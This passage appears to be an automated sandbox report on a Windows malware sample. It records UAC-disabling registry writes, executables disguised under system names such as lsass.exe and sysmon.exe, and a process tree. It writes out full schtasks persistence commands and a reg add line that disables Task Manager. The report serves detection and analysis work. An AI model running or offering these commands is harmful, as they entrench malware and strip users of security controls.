"\"C:\\browserperf\\upfc.exe\"" BlockDriversession.exe -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA BlockDriversession.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" BlockDriversession.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sysmon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" sysmon.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sysmon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" sysmon.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to determine the infected system's external IP address.
flow ioc 39 ipinfo.io 40 ipinfo.io -
Drops file in Program Files directory 10 IoCs
description ioc Process File created C:\Program Files\Windows Defender\en-US\sysmon.exe BlockDriversession.exe File opened for modification C:\Program Files (x86)\WindowsPowerShell\RCXAD0F.tmp BlockDriversession.exe File opened for modification C:\Program Files (x86)\WindowsPowerShell\WaaSMedicAgent.exe BlockDriversession.exe File opened for modification C:\Program Files\Windows Defender\en-US\RCXC929.tmp BlockDriversession.exe File opened for modification C:\Program Files\Windows Defender\en-US\RCXC9A7.tmp BlockDriversession.exe File opened for modification C:\Program Files\Windows Defender\en-US\sysmon.exe BlockDriversession.exe File created C:\Program Files (x86)\WindowsPowerShell\WaaSMedicAgent.exe BlockDriversession.exe File created C:\Program Files (x86)\WindowsPowerShell\c82b8037eab33d BlockDriversession.exe File created C:\Program Files\Windows Defender\en-US\121e5b5079f7c0 BlockDriversession.exe File opened for modification C:\Program Files (x86)\WindowsPowerShell\RCXAD10.tmp BlockDriversession.exe -
Drops file in Windows directory 10 IoCs
description ioc Process File created C:\Windows\SystemResources\Windows.UI.BlockedShutdown\pris\24dbde2999530e BlockDriversession.exe File opened for modification C:\Windows\SystemResources\Windows.UI.BlockedShutdown\pris\RCXA71F.tmp BlockDriversession.exe File opened for modification C:\Windows\Help\en-US\RCXCC29.tmp BlockDriversession.exe File opened for modification C:\Windows\Help\en-US\dwm.exe BlockDriversession.exe File created C:\Windows\SystemResources\Windows.UI.BlockedShutdown\pris\WmiPrvSE.exe BlockDriversession.exe File opened for modification C:\Windows\SystemResources\Windows.UI.BlockedShutdown\pris\WmiPrvSE.exe BlockDriversession.exe File created C:\Windows\Help\en-US\dwm.exe BlockDriversession.exe File created C:\Windows\Help\en-US\6cb0b6c459d5d3 BlockDriversession.exe File opened for modification C:\Windows\SystemResources\Windows.UI.BlockedShutdown\pris\RCXA79D.tmp BlockDriversession.exe File opened for modification C:\Windows\Help\en-US\RCXCC28.tmp BlockDriversession.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with the connected storage and/or optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempts to gather information about the victim system's language in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Modifies registry class 4 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings 1.exe Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings BlockDriversession.exe Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings sysmon.exe Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings sysmon.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 1660 reg.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 51 IoCs
schtasks.exe is often used by malware to establish persistence or to perform post-infection execution.
pid Process 4060 schtasks.exe 4584 schtasks.exe 1068 schtasks.exe 4788 schtasks.exe 1992 schtasks.exe 4196 schtasks.exe 976 schtasks.exe 216 schtasks.exe 2220 schtasks.exe 4796 schtasks.exe 4932 schtasks.exe 3804 schtasks.exe 3976 schtasks.exe 4052 schtasks.exe 3752 schtasks.exe 1044 schtasks.exe 1428 schtasks.exe 2244 schtasks.exe 3728 schtasks.exe 2804 schtasks.exe 2404 schtasks.exe 1292 schtasks.exe 2364 schtasks.exe 4536 schtasks.exe 5012 schtasks.exe 3488 schtasks.exe 4828 schtasks.exe 2932 schtasks.exe 2396 schtasks.exe 4448 schtasks.exe 1392 schtasks.exe 2904 schtasks.exe 64 schtasks.exe 1472 schtasks.exe 2552 schtasks.exe 4112 schtasks.exe 1736 schtasks.exe 2716 schtasks.exe 2060 schtasks.exe 1852 schtasks.exe 2876 schtasks.exe 4004 schtasks.exe 1492 schtasks.exe 3236 schtasks.exe 3404 schtasks.exe 1612 schtasks.exe 2936 schtasks.exe 4500 schtasks.exe 3636 schtasks.exe 2568 schtasks.exe 3424 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe 1508 BlockDriversession.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 416 sysmon.exe 1224 sysmon.exe -
Suspicious use of AdjustPrivilegeToken 14 IoCs
description pid Process Token: SeDebugPrivilege 1508 BlockDriversession.exe Token: SeDebugPrivilege 416 sysmon.exe Token: SeBackupPrivilege 3780 vssvc.exe Token: SeRestorePrivilege 3780 vssvc.exe Token: SeAuditPrivilege 3780 vssvc.exe Token: SeDebugPrivilege 1224 sysmon.exe Token: SeDebugPrivilege 1408 sysmon.exe Token: SeDebugPrivilege 1992 sysmon.exe Token: SeDebugPrivilege 1428 sysmon.exe Token: SeDebugPrivilege 4296 sysmon.exe Token: SeDebugPrivilege 632 sysmon.exe Token: SeDebugPrivilege 2276 sysmon.exe Token: SeDebugPrivilege 4788 sysmon.exe Token: SeDebugPrivilege 4052 sysmon.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 416 sysmon.exe 1224 sysmon.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3556 wrote to memory of 2012 3556 1.exe 85 PID 3556 wrote to memory of 2012 3556 1.exe 85 PID 3556 wrote to memory of 2012 3556 1.exe 85 PID 2012 wrote to memory of 3628 2012 WScript.exe 93 PID 2012 wrote to memory of 3628 2012 WScript.exe 93 PID 2012 wrote to memory of 3628 2012 WScript.exe 93 PID 3628 wrote to memory of 1508 3628 cmd.exe 95 PID 3628 wrote to memory of 1508 3628 cmd.exe 95 PID 1508 wrote to memory of 4828 1508 BlockDriversession.exe 156 PID 1508 wrote to memory of 4828 1508 BlockDriversession.exe 156 PID 3628 wrote to memory of 1660 3628 cmd.exe 158 PID 3628 wrote to memory of 1660 3628 cmd.exe 158 PID 3628 wrote to memory of 1660 3628 cmd.exe 158 PID 4828 wrote to memory of 3772 4828 cmd.exe 159 PID 4828 wrote to memory of 3772 4828 cmd.exe 159 PID 4828 wrote to memory of 416 4828 cmd.exe 161 PID 4828 wrote to memory of 416 4828 cmd.exe 161 PID 416 wrote to memory of 4584 416 sysmon.exe 163 PID 416 wrote to memory of 4584 416 sysmon.exe 163 PID 416 wrote to memory of 3000 416 sysmon.exe 164 PID 416 wrote to memory of 3000 416 sysmon.exe 164 PID 416 wrote to memory of 692 416 sysmon.exe 179 PID 416 wrote to memory of 692 416 sysmon.exe 179 PID 416 wrote to memory of 2960 416 sysmon.exe 180 PID 416 wrote to memory of 2960 416 sysmon.exe 180 PID 416 wrote to memory of 844 416 sysmon.exe 181 PID 416 wrote to memory of 844 416 sysmon.exe 181 PID 416 wrote to memory of 3460 416 sysmon.exe 182 PID 416 wrote to memory of 3460 416 sysmon.exe 182 PID 416 wrote to memory of 5072 416 sysmon.exe 183 PID 416 wrote to memory of 5072 416 sysmon.exe 183 PID 416 wrote to memory of 4468 416 sysmon.exe 185 PID 416 wrote to memory of 4468 416 sysmon.exe 185 PID 416 wrote to memory of 3892 416 sysmon.exe 187 PID 416 wrote to memory of 3892 416 sysmon.exe 187 PID 416 wrote to memory of 388 416 sysmon.exe 191 PID 416 wrote to memory of 388 416 sysmon.exe 191 PID 844 wrote to memory of 3512 844 cmd.exe 195 PID 844 wrote to memory 
of 3512 844 cmd.exe 195 PID 692 wrote to memory of 3592 692 cmd.exe 196 PID 692 wrote to memory of 3592 692 cmd.exe 196 PID 4468 wrote to memory of 5040 4468 cmd.exe 197 PID 4468 wrote to memory of 5040 4468 cmd.exe 197 PID 5072 wrote to memory of 4520 5072 cmd.exe 198 PID 5072 wrote to memory of 4520 5072 cmd.exe 198 PID 2960 wrote to memory of 3544 2960 cmd.exe 199 PID 2960 wrote to memory of 3544 2960 cmd.exe 199 PID 3892 wrote to memory of 1068 3892 cmd.exe 200 PID 3892 wrote to memory of 1068 3892 cmd.exe 200 PID 388 wrote to memory of 2816 388 cmd.exe 201 PID 388 wrote to memory of 2816 388 cmd.exe 201 PID 3460 wrote to memory of 3380 3460 cmd.exe 203 PID 3460 wrote to memory of 3380 3460 cmd.exe 203 PID 4584 wrote to memory of 1224 4584 WScript.exe 205 PID 4584 wrote to memory of 1224 4584 WScript.exe 205 PID 844 wrote to memory of 1408 844 cmd.exe 206 PID 844 wrote to memory of 1408 844 cmd.exe 206 PID 692 wrote to memory of 1992 692 cmd.exe 207 PID 692 wrote to memory of 1992 692 cmd.exe 207 PID 2960 wrote to memory of 1428 2960 cmd.exe 208 PID 2960 wrote to memory of 1428 2960 cmd.exe 208 PID 388 wrote to memory of 4296 388 cmd.exe 210 PID 388 wrote to memory of 4296 388 cmd.exe 210 PID 5072 wrote to memory of 632 5072 cmd.exe 211 -
System policy modification 1 TTPs 9 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" sysmon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" BlockDriversession.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" sysmon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" sysmon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" sysmon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" sysmon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" sysmon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" BlockDriversession.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" BlockDriversession.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\1.exe"C:\Users\Admin\AppData\Local\Temp\1.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3556 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\browserperf\DnCoBuHIAvg.vbe"2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2012 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\browserperf\RcA8rkUQUHdsADqQUNtkjn.bat" "3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3628 -
C:\browserperf\BlockDriversession.exe"C:\browserperf\BlockDriversession.exe"4⤵
- Modifies WinLogon for persistence
- UAC bypass
- Drops file in Drivers directory
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1508 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\DgHlPzdV8W.bat"5⤵
- Suspicious use of WriteProcessMemory
PID:4828 -
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:26⤵PID:3772
-
-
C:\browserperf\sysmon.exe"C:\browserperf\sysmon.exe"6⤵
- UAC bypass
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- System policy modification
PID:416 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\02a6598c-5b1d-4613-975d-28dd77e56082.vbs"7⤵
- Suspicious use of WriteProcessMemory
PID:4584 -
C:\browserperf\sysmon.exeC:\browserperf\sysmon.exe8⤵
- UAC bypass
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- System policy modification
PID:1224 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2f4171b3-058b-4288-8dc4-85946c3d3649.vbs"9⤵PID:284
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\cbf30c07-3da3-4ecc-8cbd-a9b05ca87505.vbs"9⤵PID:4224
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1643e7d5-e16c-4687-846d-a0757bf86570.vbs"7⤵PID:3000
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\zfOrxS71E3.bat"7⤵
- Suspicious use of WriteProcessMemory
PID:692 -
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:28⤵PID:3592
-
-
C:\browserperf\sysmon.exe"C:\browserperf\sysmon.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1992
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\r0MODpJtud.bat"7⤵
- Suspicious use of WriteProcessMemory
PID:2960 -
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:28⤵PID:3544
-
-
C:\browserperf\sysmon.exe"C:\browserperf\sysmon.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1428
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\QsS2ZSeOHk.bat"7⤵
- Suspicious use of WriteProcessMemory
PID:844 -
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:28⤵PID:3512
-
-
C:\browserperf\sysmon.exe"C:\browserperf\sysmon.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1408
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\eoRA4B8PWR.bat"7⤵
- Suspicious use of WriteProcessMemory
PID:3460 -
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:28⤵PID:3380
-
-
C:\browserperf\sysmon.exe"C:\browserperf\sysmon.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2276
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\zlYgv4zteq.bat"7⤵
- Suspicious use of WriteProcessMemory
PID:5072 -
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:28⤵PID:4520
-
-
C:\browserperf\sysmon.exe"C:\browserperf\sysmon.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\rBMLF9HJtT.bat"7⤵
- Suspicious use of WriteProcessMemory
PID:4468 -
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:28⤵PID:5040
-
-
C:\browserperf\sysmon.exe"C:\browserperf\sysmon.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4052
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\YeeJHhLP1x.bat"7⤵
- Suspicious use of WriteProcessMemory
PID:3892 -
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:28⤵PID:1068
-
-
C:\browserperf\sysmon.exe"C:\browserperf\sysmon.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4788
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\5wLWjZnu9K.bat"7⤵
- Suspicious use of WriteProcessMemory
PID:388 -
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:28⤵PID:2816
-
-
C:\browserperf\sysmon.exe"C:\browserperf\sysmon.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4296
-
-
-
-
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f4⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:1660
-
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 6 /tr "'C:\Windows\SystemResources\Windows.UI.BlockedShutdown\pris\WmiPrvSE.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2932
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\SystemResources\Windows.UI.BlockedShutdown\pris\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2396
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Windows\SystemResources\Windows.UI.BlockedShutdown\pris\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1852
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 14 /tr "'C:\browserperf\cmd.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2220
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\browserperf\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4060
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 14 /tr "'C:\browserperf\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4584
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WaaSMedicAgentW" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\WindowsPowerShell\WaaSMedicAgent.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2936
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WaaSMedicAgent" /sc ONLOGON /tr "'C:\Program Files (x86)\WindowsPowerShell\WaaSMedicAgent.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2364
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WaaSMedicAgentW" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\WindowsPowerShell\WaaSMedicAgent.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4796
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 10 /tr "'C:\Users\Default\Documents\SearchApp.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1472
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Users\Default\Documents\SearchApp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2876
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 14 /tr "'C:\Users\Default\Documents\SearchApp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4500
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\browserperf\csrss.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4448
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\browserperf\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2244
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\browserperf\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2552
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sysmons" /sc MINUTE /mo 14 /tr "'C:\browserperf\sysmon.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4112
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\browserperf\sysmon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3728
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sysmons" /sc MINUTE /mo 10 /tr "'C:\browserperf\sysmon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4004
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 5 /tr "'C:\Users\Admin\3D Objects\sppsvc.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2804
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Users\Admin\3D Objects\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2404
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\3D Objects\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3636
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "upfcu" /sc MINUTE /mo 8 /tr "'C:\browserperf\upfc.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1068
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\browserperf\upfc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4932
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "upfcu" /sc MINUTE /mo 14 /tr "'C:\browserperf\upfc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1292
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsassl" /sc MINUTE /mo 8 /tr "'C:\Users\Public\lsass.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3804
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Users\Public\lsass.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4536
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsassl" /sc MINUTE /mo 11 /tr "'C:\Users\Public\lsass.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2568
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\browserperf\dllhost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4788
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\browserperf\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3424
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\browserperf\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1492
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 9 /tr "'C:\browserperf\unsecapp.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1992
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\browserperf\unsecapp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3976
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 13 /tr "'C:\browserperf\unsecapp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5012
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\browserperf\csrss.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1392
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\browserperf\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3752
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\browserperf\csrss.exe'" /rl HIGHEST /f1⤵
